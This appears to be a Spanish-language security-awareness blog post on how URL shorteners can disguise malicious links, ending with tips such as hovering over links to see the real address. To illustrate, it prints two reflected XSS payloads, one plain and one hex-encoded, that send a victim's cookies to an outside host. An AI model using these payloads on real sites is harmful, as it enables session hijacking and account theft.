El peligro de los acortadores de URL’S

Hoy en dia, gracias al furor que ha tenido twitter y otras redes sociales,  se ha hecho muy  comun utilizar paginas que nos brindan el servicio de acortar las direcciones. Este servicio es muy util, ya que  nos permiten  acortar aquellas urls, que  son demasiado largas y que son dificiles de recordar. Su uso  es muy sencillo solo basta con entrar a un sitio de tantos en la red que  nos dan este servicio  como por ejemplo: Bit.ly o tinyurl.com alli en una caja de texto pegamos la url que deseamos recortar  damos click en el boton y listo tendremos nuestra url  recortada, algo asi como esto:

http://bit.ly/4G4ueH
http://tinyurl.com/ykfuc64

Sin embargo, esto puede llegar a convertirse en un arma de doble filo, debido a que  algun individuo de forma malintencionada puede “camuflar” una url infectada con algun troyano, o una url con un script que capture tus cookies (XSS). Y esto como ocurre?? Hay gente que puede caer en un truco tan viejo?? La respuesta es SI. Pongamos un ejemplo, un informatico  ve  que  una nena  muy linda, comparte un enlace de este tipo:

http://sitio.com/prueba.php?variable=”><script>document.location=’http://www.lugarscript.com/cgi-bin/cookie.cgi? ‘%20+document.cookie</script>

o este:

http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

Para cualquier persona con sentido comun (bueno eso creo y espero)  que vea este enlace, lo va a ver sospechoso y sabra que ese enlace no es lo que dice ser la nena linda.  Pero que pasaria si se usa una web que nos recorta la url? Nuestro enlace malicioso quedaria asi:

http://bit.ly/2SOKtG

o asi:

http://bit.ly/3hPNpy

Ahora si, mas de una persona daria click en ese enlace, si la nena linda dice que en esa pequeña url se encuentran sus fotos desnuda. Igualmente suele suceder con el malware, muchas veces viene camuflado de esa forma, y  algunas personas  dan click sin pensar que hay detras de esa url corta.

Recomendaciones.

  • Tener sentido comun, y no dar click en cualquier enlace.
  • No visitar enlaces sospechosos compartidos por mujeres voluptuosas  o en su defecto hombres.
  • Antes de dar click en una url de este tipo, pase el puntero por el enlace, y este le va a mostrar la verdadera url, de tal forma, sabras hacia donde te  lleva el enlace.

Estas son pequeñas cosas,  pero  que muchos usuarios de la red no lo saben,  y son blancos faciles de todo el malware que existe en la red.

3 Comments